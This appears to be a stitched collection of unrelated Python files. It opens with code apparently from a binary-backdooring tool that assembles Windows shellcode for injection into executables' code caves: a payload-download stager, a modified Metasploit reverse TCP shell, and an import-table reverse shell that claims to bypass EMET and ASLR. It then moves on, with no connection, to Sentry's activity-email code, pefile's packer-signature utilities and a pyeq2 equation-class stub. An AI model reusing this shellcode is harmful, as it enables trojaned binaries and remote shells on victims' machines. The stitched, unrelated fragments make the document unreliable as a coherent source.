self.shellcode1 += "\x90\x5e"
self.shellcode1 += ("\x90\x90\x90"
"\xF2\xA4"
"\xE8\x20\x00\x00"
"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
"\x58\x58\x90\x61"
)
breakupvar = eat_code_caves(flItms, 0, 2)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip("L")), 16))
else:
self.shellcode1 += "\xE9"
self.shellcode1 += struct.pack("<H", 361 + len(self.HOST))
self.shellcode1 += "\x00\x00" # <---length shellcode2 + 5
#Begin shellcode 2:
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 234).rstrip("L")), 16))
else:
self.shellcode2 = "\xE8\xB7\xFF\xFF\xFF"
self.shellcode2 += ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68"
"\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57"
"\x57\x57\x57\x6a\x00\x54\x68\x3a\x56\x79\xa7\xff\xd5\xeb\x5f"
"\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68")
self.shellcode2 += struct.pack("<h", self.PORT)
self.shellcode2 += ("\x00\x00\x53"
"\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x48\x59\x31\xd2\x52\x68"
"\x00\x32\xa0\x84\x52\x52\x52\x51\x52\x50\x68\xeb\x55\x2e\x3b"
"\xff\xd5\x89\xc6\x6a\x10\x5b\x68\x80\x33\x00\x00\x89\xe0\x6a"
"\x04\x50\x6a\x1f\x56\x68\x75\x46\x9e\x86\xff\xd5\x31\xff\x57"
"\x57\x57\x57\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x1a"
"\x4b\x74\x10\xeb\xd5\xeb\x49\xe8\xb3\xff\xff\xff\x2f\x48\x45"
"\x56\x79\x00\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00"
"\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff"
"\xd5\x93\x53\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68"
"\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xcd\x8b\x07\x01\xc3\x85"
"\xc0\x75\xe5\x58\xc3\xe8\x51\xff\xff\xff")
self.shellcode2 += self.HOST
self.shellcode2 += "\x00"
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def reverse_shell_tcp(self, flItms, CavesPicked={}):
"""
Modified metasploit windows/shell_reverse_tcp shellcode
to enable continued execution and cave jumping.
"""
if self.PORT is None:
print ("Must provide port")
return False
#breakupvar is the distance between codecaves
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = "\xfc\xe8"
if flItms['cave_jumping'] is True:
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\x89\x00\x00\x00"
self.shellcode1 += ("\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86"
)
self.shellcode2 = ("\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x68"
)
self.shellcode2 += self.pack_ip_addresses() # IP
self.shellcode2 += ("\x68\x02\x00")
self.shellcode2 += struct.pack('!h', self.PORT) # PORT
self.shellcode2 += ("\x89\xe6\x6a\x10\x56"
"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3"
"\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24"
"\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56"
"\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89"
#The NOP in the line below allows for continued execution.
"\xe0\x4e\x90\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0"
"\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80"
"\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
"\x81\xc4\xfc\x01\x00\x00"
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
def iat_reverse_tcp(self, flItms, CavesPicked={}):
"""
Position dependent shellcode that uses API thunks of LoadLibraryA and
GetProcAddress to find and load APIs for callback to C2.
Bypasses EMET 4.1. Idea from Jared DeMott:
http://labs.bromium.com/2014/02/24/bypassing-emet-4-1/
via @bannedit0 (twitter handle)
"""
if self.PORT is None:
print ("Must provide port")
return False
if 'LoadLibraryA' not in flItms:
print "[!] Binary does not have the LoadLibraryA API in IAT"
return False
if 'GetProcAddress' not in flItms:
print "[!] Binary does not have GetProcAddress API in IAT"
return False
#### BEGIN ASLR BYPASS ####
# This works because we know the original entry point of the application and
# where we are supposed to be as we control where our shellcode goes
self.shellcode1 = "\xfc" # CLD
self.shellcode1 += "\xbb" # mov value below ebx
if flItms['NewCodeCave'] is True:
if 'CodeCaveVirtualAddress' in flItms:
#Current address if not in ASLR
self.shellcode1 += struct.pack("<I", (flItms['CodeCaveVirtualAddress'] +
len(self.shellcode1) +
len(self.stackpreserve) +
flItms['buffer'] + 201
)
)
else:
self.shellcode += '\x00x\x00\x00\x00'
else:
if flItms['CavesPicked'] == {}:
self.shellcode1 += '\x00\x00\x00\x00'
else:
for section in flItms['Sections']:
if section[0] == flItms['CavesPicked'][0][0]:
VirtualLOCofSection = section[2]
diskLOCofSection = section[4]
#Current address if not in ASLR
self.shellcode1 += struct.pack("<I", int(flItms['CavesPicked'][0][1], 16) -
diskLOCofSection +
VirtualLOCofSection +
flItms['ImageBase'] +
len(self.shellcode1) +
len(self.stackpreserve) +
9)
self.shellcode1 += "\xe8\x00\x00\x00\x00"
self.shellcode1 += "\x5e" # pop esi
self.shellcode1 += "\x2b\xf3" # sub esi,ebx
self.shellcode1 += "\x83\xfe\x00" # cmp esi,0
self.shellcode1 += "\xbb" # mov value below to EBX
self.shellcode1 += struct.pack("<I", flItms['LoadLibraryA'])
self.shellcode1 += "\xb9" # mov value below to ECX
self.shellcode1 += struct.pack("<I", flItms['GetProcAddress'])
# Don't jump if in ASLR env
self.shellcode1 += "\x74\x15" # JZ (XX) # Jump to location after ALSR check
#Find the base addr
#Base address difference now in ESI
self.shellcode1 += "\xb8" # mov eax, Normal imagebase
self.shellcode1 += struct.pack("<I", flItms['ImageBase'])
self.shellcode1 += "\x03\xc6" # add eax, esi # NOW YOU HAVE ASLR IMAGEBASE in EAX
self.shellcode1 += "\xbb" # mov ebx, the loadlibA offset
self.shellcode1 += struct.pack("<I", flItms['LoadLibraryAOffset'])
self.shellcode1 += "\xb9" # mov ecx, the getprocaddr offset
self.shellcode1 += struct.pack("<I", flItms['GetProcAddressOffset'])
self.shellcode1 += "\x03\xd8" # add ebx, eax #EBX will hold LoadlibAoffset
self.shellcode1 += "\x01\xc1" # add ecx, eax #ECX will hold Getprocaddress
####END ASLR BYPASS####
self.shellcode1 += ("\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x87\xF1\xFF\x13\x68"
"\x75\x70\x00\x00\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x54\x50"
"\x97\xFF\x16\x95\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\xFF\xD5\x68"
"\x74\x41\x00\x00\x68\x6F\x63\x6B\x65\x68\x57\x53\x41\x53\x54\x57"
"\xFF\x16\x95\x31\xC0\x50\x50\x50\x50\x40\x50\x40\x50\xFF\xD5\x95"
"\x68\x65\x63\x74\x00\x68\x63\x6F\x6E\x6E\x54\x57\xFF\x16\x87\xCD"
"\x95\x6A\x05\x68")
self.shellcode1 += self.pack_ip_addresses() # HOST
self.shellcode1 += "\x68\x02\x00"
self.shellcode1 += struct.pack('!h', self.PORT) # PORT
self.shellcode1 += ("\x89\xE2\x6A"
"\x10\x52\x51\x87\xF9\xFF\xD5"
)
#breakupvar is the distance between codecaves
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9" # JMP opcode
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
self.shellcode2 = ("\x85\xC0\x74\x00\x6A\x00\x68\x65\x6C"
"\x33\x32\x68\x6B\x65\x72\x6E\x54\xFF\x13\x68\x73\x41\x00\x00\x68"
"\x6F\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x54\x50"
"\xFF\x16\x95\x93\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x87\xFE"
"\x92\x31\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\x01\x01"
"\x8D\x44\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4E\x56"
"\x56\x53\x56\x87\xDA\xFF\xD5\x89\xE6\x6A\x00\x68\x65\x6C\x33\x32"
"\x68\x6B\x65\x72\x6E\x54\xFF\x13\x68\x65\x63\x74\x00\x68\x65\x4F"
"\x62\x6A\x68\x69\x6E\x67\x6C\x68\x46\x6F\x72\x53\x68\x57\x61\x69"
"\x74\x54\x50\x95\xFF\x17\x95\x89\xF2\x31\xF6\x4E\x56\x46\x89\xD4"
"\xFF\x32\x96\xFF\xD5\x81\xC4\x34\x02\x00\x00"
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
|
|
from __future__ import absolute_import
from django.core.urlresolvers import reverse
from django.utils.html import escape, mark_safe
from sentry import options
from sentry.models import (
GroupSubscription, ProjectOption, UserAvatar, UserOption
)
from sentry.utils.avatar import get_email_avatar
from sentry.utils.email import MessageBuilder, group_id_to_email
from sentry.utils.http import absolute_uri
from sentry.utils.linksign import generate_signed_link
class ActivityEmail(object):
def __init__(self, activity):
self.activity = activity
self.project = activity.project
self.organization = self.project.organization
self.group = activity.group
def _get_subject_prefix(self):
prefix = ProjectOption.objects.get_value(
project=self.project,
key='subject_prefix',
)
if not prefix:
prefix = options.get('mail.subject-prefix')
return prefix
def should_email(self):
return True
def get_participants(self):
# TODO(dcramer): not used yet today except by Release's
if not self.group:
return []
participants = set(
GroupSubscription.objects.get_participants(
group=self.group
)
)
if self.activity.user is not None:
receive_own_activity = UserOption.objects.get_value(
user=self.activity.user,
project=None,
key='self_notifications',
default='0'
) == '1'
if not receive_own_activity:
participants.discard(self.activity.user)
return participants
def get_template(self):
return 'sentry/emails/activity/generic.txt'
def get_html_template(self):
return 'sentry/emails/activity/generic.html'
def get_project_link(self):
return absolute_uri('/{}/{}/'.format(
self.organization.slug,
self.project.slug,
))
def get_group_link(self):
return absolute_uri('/{}/{}/issues/{}/'.format(
self.organization.slug,
self.project.slug,
self.group.id,
))
def get_base_context(self):
activity = self.activity
context = {
'data': activity.data,
'author': activity.user,
'project': self.project,
'project_link': self.get_project_link(),
}
if activity.group:
context.update(self.get_group_context())
return context
def get_group_context(self):
group_link = self.get_group_link()
activity_link = '{}activity/'.format(group_link)
return {
'group': self.group,
'link': group_link,
'activity_link': activity_link,
}
def get_email_type(self):
return 'notify.activity.{}'.format(
self.activity.get_type_display(),
)
def get_subject(self):
group = self.group
return u'[%s] %s: %s' % (
self.project.get_full_name(),
group.get_level_display().upper(),
group.message_short
)
def get_context(self):
description = self.get_description()
try:
description, params, html_params = description
except ValueError:
try:
description, params = description
html_params = params
except ValueError:
params, html_params = {}, {}
return {
'activity_name': self.get_activity_name(),
'text_description': self.description_as_text(
description, params),
'html_description': self.description_as_html(
description, html_params),
}
def get_headers(self):
project = self.project
group = self.group
headers = {
'X-Sentry-Team': project.team.slug,
'X-Sentry-Project': project.slug,
}
if group:
headers.update({
'X-Sentry-Logger': group.logger,
'X-Sentry-Logger-Level': group.get_level_display(),
'X-Sentry-Reply-To': group_id_to_email(group.id),
})
return headers
def get_description(self):
raise NotImplementedError
def avatar_as_html(self):
user = self.activity.user
if not user:
return '<span class="avatar sentry"></span>'
avatar_type = user.get_avatar_type()
if avatar_type == 'upload':
return '<img class="avatar" src="{}" />'.format(
escape(self._get_user_avatar_url(user))
)
elif avatar_type == 'letter_avatar':
return get_email_avatar(
user.get_display_name(), user.get_label(), 20, False)
else:
return get_email_avatar(
user.get_display_name(), user.get_label(), 20, True)
def _get_user_avatar_url(self, user, size=20):
try:
avatar = UserAvatar.objects.get(user=user)
except UserAvatar.DoesNotExist:
return ''
url = reverse('sentry-user-avatar-url', args=[avatar.ident])
if size:
url = '{}?s={}'.format(url, int(size))
return absolute_uri(url)
def description_as_text(self, description, params):
user = self.activity.user
if user:
name = user.name or user.email
else:
name = u'Sentry'
context = {
'author': name,
'an issue': u'an issue',
}
context.update(params)
return description.format(**context)
def description_as_html(self, description, params):
user = self.activity.user
if user:
name = user.get_display_name()
else:
name = 'Sentry'
fmt = u'<span class="avatar-container">{}</span> <strong>{}</strong>'
author = mark_safe(fmt.format(
self.avatar_as_html(),
escape(name),
))
an_issue = u'<a href="{}">an issue</a>'.format(
escape(self.get_group_link()),
)
context = {
'author': author,
'an issue': an_issue,
}
context.update(params)
return mark_safe(description.format(**context))
def send(self):
if not self.should_email():
return
users = self.get_participants()
if not users:
return
activity = self.activity
project = self.project
group = self.group
context = self.get_base_context()
context.update(self.get_context())
subject_prefix = self._get_subject_prefix()
subject = (u'{}{}'.format(
subject_prefix,
self.get_subject(),
)).encode('utf-8')
template = self.get_template()
html_template = self.get_html_template()
email_type = self.get_email_type()
headers = self.get_headers()
for user in users:
if group:
context['unsubscribe_link'] = generate_signed_link(
user.id,
'sentry-account-email-unsubscribe-issue',
kwargs={'issue_id': group.id},
)
msg = MessageBuilder(
subject=subject,
template=template,
html_template=html_template,
headers=headers,
type=email_type,
context=context,
reference=activity,
reply_reference=group,
)
msg.add_users([user.id], project=project)
msg.send_async()
|
|
# -*- coding: Latin-1 -*-
"""peutils, Portable Executable utilities module
Copyright (c) 2005-2013 Ero Carrera <ero.carrera@gmail.com>
All rights reserved.
For detailed copyright information see the file COPYING in
the root of the distribution archive.
"""
from __future__ import division
from future import standard_library
standard_library.install_aliases()
from builtins import range
from past.utils import old_div
from builtins import object
import os
import re
import string
import urllib.request, urllib.parse, urllib.error
import pefile
__author__ = 'Ero Carrera'
__version__ = pefile.__version__
__contact__ = 'ero.carrera@gmail.com'
class SignatureDatabase(object):
"""This class loads and keeps a parsed PEiD signature database.
Usage:
sig_db = SignatureDatabase('/path/to/signature/file')
and/or
sig_db = SignatureDatabase()
sig_db.load('/path/to/signature/file')
Signature databases can be combined by performing multiple loads.
The filename parameter can be a URL too. In that case the
signature database will be downloaded from that location.
"""
def __init__(self, filename=None, data=None):
# RegExp to match a signature block
#
self.parse_sig = re.compile(
'\[(.*?)\]\s+?signature\s*=\s*(.*?)(\s+\?\?)*\s*ep_only\s*=\s*(\w+)(?:\s*section_start_only\s*=\s*(\w+)|)', re.S)
# Signature information
#
# Signatures are stored as trees using dictionaries
# The keys are the byte values while the values for
# each key are either:
#
# - Other dictionaries of the same form for further
# bytes in the signature
#
# - A dictionary with a string as a key (packer name)
# and None as value to indicate a full signature
#
self.signature_tree_eponly_true = dict ()
self.signature_count_eponly_true = 0
self.signature_tree_eponly_false = dict ()
self.signature_count_eponly_false = 0
self.signature_tree_section_start = dict ()
self.signature_count_section_start = 0
# The depth (length) of the longest signature
#
self.max_depth = 0
self.__load(filename=filename, data=data)
def generate_section_signatures(self, pe, name, sig_length=512):
"""Generates signatures for all the sections in a PE file.
If the section contains any data a signature will be created
for it. The signature name will be a combination of the
parameter 'name' and the section number and its name.
"""
section_signatures = list()
for idx, section in enumerate(pe.sections):
if section.SizeOfRawData < sig_length:
continue
#offset = pe.get_offset_from_rva(section.VirtualAddress)
offset = section.PointerToRawData
sig_name = '%s Section(%d/%d,%s)' % (
name, idx + 1, len(pe.sections),
''.join([c for c in section.Name if c in string.printable]))
section_signatures.append(
self.__generate_signature(
pe, offset, sig_name, ep_only=False,
section_start_only=True,
sig_length=sig_length) )
return '\n'.join(section_signatures)+'\n'
def generate_ep_signature(self, pe, name, sig_length=512):
"""Generate signatures for the entry point of a PE file.
Creates a signature whose name will be the parameter 'name'
and the section number and its name.
"""
offset = pe.get_offset_from_rva(pe.OPTIONAL_HEADER.AddressOfEntryPoint)
return self.__generate_signature(
pe, offset, name, ep_only=True, sig_length=sig_length)
def __generate_signature(self, pe, offset, name, ep_only=False,
section_start_only=False, sig_length=512):
data = pe.__data__[offset:offset+sig_length]
signature_bytes = ' '.join(['%02x' % ord(c) for c in data])
if ep_only == True:
ep_only = 'true'
else:
ep_only = 'false'
if section_start_only == True:
section_start_only = 'true'
else:
section_start_only = 'false'
signature = '[%s]\nsignature = %s\nep_only = %s\nsection_start_only = %s\n' % (
name, signature_bytes, ep_only, section_start_only)
return signature
def match(self, pe, ep_only=True, section_start_only=False):
"""Matches and returns the exact match(es).
If ep_only is True the result will be a string with
the packer name. Otherwise it will be a list of the
form (file_ofsset, packer_name). Specifying where
in the file the signature was found.
"""
matches = self.__match(pe, ep_only, section_start_only)
# The last match (the most precise) from the
# list of matches (if any) is returned
#
if matches:
if ep_only == False:
# Get the most exact match for each list of matches
# at a given offset
#
return [(match[0], match[1][-1]) for match in matches]
return matches[1][-1]
return None
def match_all(self, pe, ep_only=True, section_start_only=False):
"""Matches and returns all the likely matches."""
matches = self.__match(pe, ep_only, section_start_only)
if matches:
if ep_only == False:
# Get the most exact match for each list of matches
# at a given offset
#
return matches
return matches[1]
return None
def __match(self, pe, ep_only, section_start_only):
# Load the corresponding set of signatures
# Either the one for ep_only equal to True or
# to False
#
if section_start_only is True:
# Fetch the data of the executable as it'd
# look once loaded in memory
#
try :
data = pe.__data__
except Exception as excp :
raise
# Load the corresponding tree of signatures
#
signatures = self.signature_tree_section_start
# Set the starting address to start scanning from
#
scan_addresses = [section.PointerToRawData for section in pe.sections]
elif ep_only is True:
# Fetch the data of the executable as it'd
# look once loaded in memory
#
try :
data = pe.get_memory_mapped_image()
except Exception as excp :
raise
# Load the corresponding tree of signatures
#
signatures = self.signature_tree_eponly_true
# Fetch the entry point of the PE file and the data
# at the entry point
#
ep = pe.OPTIONAL_HEADER.AddressOfEntryPoint
# Set the starting address to start scanning from
#
scan_addresses = [ep]
else:
data = pe.__data__
signatures = self.signature_tree_eponly_false
scan_addresses = range( len(data) )
# For each start address, check if any signature matches
#
matches = []
for idx in scan_addresses:
result = self.__match_signature_tree(
signatures,
data[idx:idx+self.max_depth])
if result:
matches.append( (idx, result) )
# Return only the matched items found at the entry point if
# ep_only is True (matches will have only one element in that
# case)
#
if ep_only is True:
if matches:
return matches[0]
return matches
def match_data(self, code_data, ep_only=True, section_start_only=False):
data = code_data
scan_addresses = [ 0 ]
# Load the corresponding set of signatures
# Either the one for ep_only equal to True or
# to False
#
if section_start_only is True:
# Load the corresponding tree of signatures
#
signatures = self.signature_tree_section_start
# Set the starting address to start scanning from
#
elif ep_only is True:
# Load the corresponding tree of signatures
#
signatures = self.signature_tree_eponly_true
# For each start address, check if any signature matches
#
matches = []
for idx in scan_addresses:
result = self.__match_signature_tree(
signatures,
data[idx:idx+self.max_depth])
if result:
matches.append( (idx, result) )
# Return only the matched items found at the entry point if
# ep_only is True (matches will have only one element in that
# case)
#
if ep_only is True:
if matches:
return matches[0]
return matches
def __match_signature_tree(self, signature_tree, data, depth = 0):
"""Recursive function to find matches along the signature tree.
signature_tree is the part of the tree left to walk
data is the data being checked against the signature tree
depth keeps track of how far we have gone down the tree
"""
matched_names = list ()
match = signature_tree
# Walk the bytes in the data and match them
# against the signature
#
for idx, byte in enumerate ( [b if isinstance(b, int) else ord(b) for b in data] ):
# If the tree is exhausted...
#
if match is None :
break
# Get the next byte in the tree
#
match_next = match.get(byte, None)
# If None is among the values for the key
# it means that a signature in the database
# ends here and that there's an exact match.
#
if None in list(match.values()):
# idx represent how deep we are in the tree
#
#names = [idx+depth]
names = list()
# For each of the item pairs we check
# if it has an element other than None,
# if not then we have an exact signature
#
for item in list(match.items()):
if item[1] is None :
names.append (item[0])
matched_names.append(names)
# If a wildcard is found keep scanning the signature
# ignoring the byte.
#
if '??' in match :
match_tree_alternate = match.get ('??', None)
data_remaining = data[idx + 1 :]
if data_remaining:
matched_names.extend(
self.__match_signature_tree(
match_tree_alternate, data_remaining, idx+depth+1))
match = match_next
# If we have any more packer name in the end of the signature tree
# add them to the matches
#
if match is not None and None in list(match.values()):
#names = [idx + depth + 1]
names = list()
for item in list(match.items()) :
if item[1] is None:
names.append(item[0])
matched_names.append(names)
return matched_names
def load(self , filename=None, data=None):
"""Load a PEiD signature file.
Invoking this method on different files combines the signatures.
"""
self.__load(filename=filename, data=data)
def __load(self, filename=None, data=None):
if filename is not None:
# If the path does not exist, attempt to open a URL
#
if not os.path.exists(filename):
try:
sig_f = urllib.request.urlopen(filename)
sig_data = sig_f.read()
sig_f.close()
except IOError:
# Let this be raised back to the user...
raise
else:
# Get the data for a file
#
try:
sig_f = open( filename, 'rt' )
sig_data = sig_f.read()
sig_f.close()
except IOError:
# Let this be raised back to the user...
raise
else:
sig_data = data
# If the file/URL could not be read or no "raw" data
# was provided there's nothing else to do
#
if not sig_data:
return
# Helper function to parse the signature bytes
#
def to_byte(value):
if '?' in value:
return value
return int(value, 16)
# Parse all the signatures in the file
#
matches = self.parse_sig.findall(sig_data)
# For each signature, get the details and load it into the
# signature tree
#
for packer_name, signature, superfluous_wildcards, ep_only, section_start_only in matches:
ep_only = ep_only.strip().lower()
signature = signature.replace('\\n', '').strip()
signature_bytes = [to_byte(b) for b in signature.split()]
if ep_only == 'true':
ep_only = True
else:
ep_only = False
if section_start_only == 'true':
section_start_only = True
else:
section_start_only = False
depth = 0
if section_start_only is True:
tree = self.signature_tree_section_start
self.signature_count_section_start += 1
else:
if ep_only is True :
tree = self.signature_tree_eponly_true
self.signature_count_eponly_true += 1
else :
tree = self.signature_tree_eponly_false
self.signature_count_eponly_false += 1
for idx, byte in enumerate (signature_bytes) :
if idx+1 == len(signature_bytes):
tree[byte] = tree.get( byte, dict() )
tree[byte][packer_name] = None
else :
tree[byte] = tree.get ( byte, dict() )
tree = tree[byte]
depth += 1
if depth > self.max_depth:
self.max_depth = depth
def is_valid( pe ):
""""""
pass
def is_suspicious( pe ):
"""
unusual locations of import tables
non recognized section names
presence of long ASCII strings
"""
relocations_overlap_entry_point = False
sequential_relocs = 0
# If relocation data is found and the entries go over the entry point, and also are very
# continuous or point outside section's boundaries => it might imply that an obfuscation
# trick is being used or the relocations are corrupt (maybe intentionally)
#
if hasattr(pe, 'DIRECTORY_ENTRY_BASERELOC'):
for base_reloc in pe.DIRECTORY_ENTRY_BASERELOC:
last_reloc_rva = None
for reloc in base_reloc.entries:
if reloc.rva <= pe.OPTIONAL_HEADER.AddressOfEntryPoint <= reloc.rva + 4:
relocations_overlap_entry_point = True
if last_reloc_rva is not None and last_reloc_rva <= reloc.rva <= last_reloc_rva + 4:
sequential_relocs += 1
last_reloc_rva = reloc.rva
# If import tables or strings exist (are pointed to) to within the header or in the area
# between the PE header and the first section that's supicious
#
# IMPLEMENT
warnings_while_parsing = False
# If we have warnings, that's suspicious, some of those will be because of out-of-ordinary
# values are found in the PE header fields
# Things that are reported in warnings:
# (parsing problems, special section characteristics i.e. W & X, uncommon values of fields,
# unusual entrypoint, suspicious imports)
#
warnings = pe.get_warnings()
if warnings:
warnings_while_parsing
# If there are few or none (should come with a standard "density" of strings/kilobytes of data) longer (>8)
# ascii sequences that might indicate packed data, (this is similar to the entropy test in some ways but
# might help to discard cases of legitimate installer or compressed data)
# If compressed data (high entropy) and is_driver => uuuuhhh, nasty
pass
def is_probably_packed( pe ):
"""Returns True is there is a high likelihood that a file is packed or contains compressed data.
The sections of the PE file will be analyzed, if enough sections
look like containing containing compressed data and the data makes
up for more than 20% of the total file size. The function will
return True.
"""
# Calculate the lenth of the data up to the end of the last section in the
# file. Overlay data won't be taken into account
#
total_pe_data_length = len( pe.trim() )
has_significant_amount_of_compressed_data = False
# If some of the sections have high entropy and they make for more than 20% of the file's size
# it's assumed that it could be an installer or a packed file
total_compressed_data = 0
for section in pe.sections:
s_entropy = section.get_entropy()
s_length = len( section.get_data() )
# The value of 7.4 is empircal, based of looking at a few files packed
# by different packers
if s_entropy > 7.4:
total_compressed_data += s_length
if (old_div((1.0 * total_compressed_data),total_pe_data_length)) > .2:
has_significant_amount_of_compressed_data = True
return has_significant_amount_of_compressed_data
|
|
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import absolute_import
# pyeq2 is a collection of equations expressed as Python classes
#
# Copyright (C) 2013 James R. Phillips
# 2548 Vera Cruz Drive
# Birmingham, AL 35235 USA
#
# email: zunzun@zunzun.com
#
# License: BSD-style (see LICENSE.txt in main source directory)
import sys, os
if os.path.join(sys.path[0][:sys.path[0].rfind(os.sep)], '..') not in sys.path:
sys.path.append(os.path.join(sys.path[0][:sys.path[0].rfind(os.sep)], '..'))
import pyeq2
import numpy
numpy.seterr(all= 'ignore')
import pyeq2.Model_3D_BaseClass
class AndreaPrunottoSigmoidA(pyeq2.Model_3D_BaseClass.Model_3D_BaseClass):
_baseName = "Andrea Prunotto Sigmoid A"
